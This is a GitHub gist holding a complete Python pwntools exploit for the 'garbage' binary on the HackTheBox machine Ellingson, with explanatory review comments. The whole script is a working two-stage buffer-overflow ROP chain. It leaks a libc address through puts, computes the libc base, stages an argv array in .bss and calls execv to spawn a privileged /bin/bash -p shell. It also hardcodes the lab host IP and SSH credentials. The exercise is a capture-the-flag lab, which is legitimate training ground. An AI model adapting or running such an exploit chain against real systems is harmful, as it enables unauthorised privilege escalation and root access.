@KaoRz
Last active December 11, 2019 01:13
Garbage - Exploiting | Ellingson privilege escalation, HackTheBox
import os, sys
from pwn import *
# Exploit driver for the "garbage" binary on the HackTheBox machine Ellingson.
# Flow, as written below: overflow the password prompt with a ROP chain that
# leaks puts@GLIBC and returns to main, compute the libc base from the leak,
# stage an argv array in .bss via gets(), then overflow a second time to call
# execv() from libc.
# NOTE(review): written for Python 2 pwntools. str and bytes are mixed freely
# below ('' + p64(...), ljust(8, '\x00')); on Python 3 those raise TypeError.
HOST = '10.10.10.139'
USER = 'margo'
# Lab credentials committed in clear text. Outside a CTF, keep secrets out of
# the script (environment variable or interactive prompt) and out of history.
PASS = 'iamgod$08'
LOCAL = False
elf = ELF('./garbage')
context.terminal = ['tmux', 'sp', '-h']
# context.log_level = 'DEBUG'
if LOCAL == True:
    # Local run: use the system libc and attach a PTY so the prompt behaves
    # like the remote one.
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
    io = process(elf.path, stdin = PTY)
else:
    # Remote run: libc copied from the target must match, since offsets are
    # resolved from it below.
    libc = ELF('./libc.so.6', checksec = False)
    # stderr is redirected to /dev/null (presumably to silence pwntools' ssh
    # chatter). The handle is never closed or restored, so any later
    # traceback is silently discarded as well.
    f = open('/dev/null', 'w')
    sys.stderr = f
    shell = ssh(USER, HOST, password = PASS)
    io = shell.run('/usr/bin/garbage')
# Stage 1 chain. 136 bytes of filler reach the saved return address (the
# offset is not derived here). Then: puts(got['puts']) prints the resolved
# libc pointer, gets(0x404100) reads the argv array staged below into .bss,
# and control returns to main so the prompt can be overflowed again.
# All gadget addresses are absolute 0x40xxxx values, which only works if the
# binary is not PIE — confirm with checksec on ./garbage.
leak = flat(
'A' * 136,
0x40179b, # 0x000000000040179b : pop rdi ; ret
elf.got['puts'],
elf.sym['puts'],
0x40179b, # 0x000000000040179b : pop rdi ; ret
0x404100, # .bss + 48
elf.sym['gets'],
0x401016, # 0x0000000000401016 : ret <Alignment>
0x401619, # .text:0000000000401619 : push rbp (main)
endianness = 'little', word_size = 64, sign = False)
io.sendlineafter('access password: ', leak)
io.recvuntil('denied.\n')
# Drop the trailing newline, pad the printed pointer to 8 bytes, and unpack
# it as a little-endian u64; the libc base is then leak minus puts' offset.
leak = u64(io.recvline()[:-1].ljust(8, '\x00'))
libc.address = leak - libc.sym['puts']
log.success('Leaked puts@@GLIBC: ' + hex(leak))
log.info('GLIBC base address: ' + hex(libc.address))
log.info('GLIBC execv address: ' + hex(libc.sym['execv']))
# Fake argv laid out at 0x404100:
#   +0  pointer to +24 ('/bin/bash')
#   +8  pointer to +34 ('-p')
#   +16 NULL terminator
#   +24 the two strings back to back
# '-p' is presumably used because garbage runs with elevated privileges (the
# title says privilege escalation) — verify against the target's permissions.
fake_array = ''
fake_array += p64(0x404100 + 24)
fake_array += p64(0x404100 + 34)
fake_array += '\x00' * 8
fake_array += '/bin/bash\x00-p'
# Short pause, apparently to let the remote gets() be reached before the
# array is sent; a fixed sleep is timing-dependent rather than synchronised.
sleep(0.5)
io.sendline(fake_array)
# Stage 2 chain: execv(0x404118, 0x404100), i.e. execv("/bin/bash", argv).
# The 'A' * 8 only fills the r15 slot of the pop rsi ; pop r15 gadget.
shell = flat(
'A' * 136,
0x40179b, # 0x000000000040179b : pop rdi ; ret
0x404100 + 24, # .bss + 72 ('/bin/bash')
0x401799, # 0x0000000000401799 : pop rsi ; pop r15 ; ret
0x404100, # .bss + 48
'A' * 8, # Junk
0x401016, # 0x0000000000401016 : ret <Alignment>
libc.sym['execv'],
endianness = 'little', word_size = 64, sign = False)
log.progress('Spawning shell...')
io.sendlineafter('access password: ', shell)
# Drain whatever the prompt echoes back, then hand the tube to the user.
io.recv()
io.interactive()
io.close()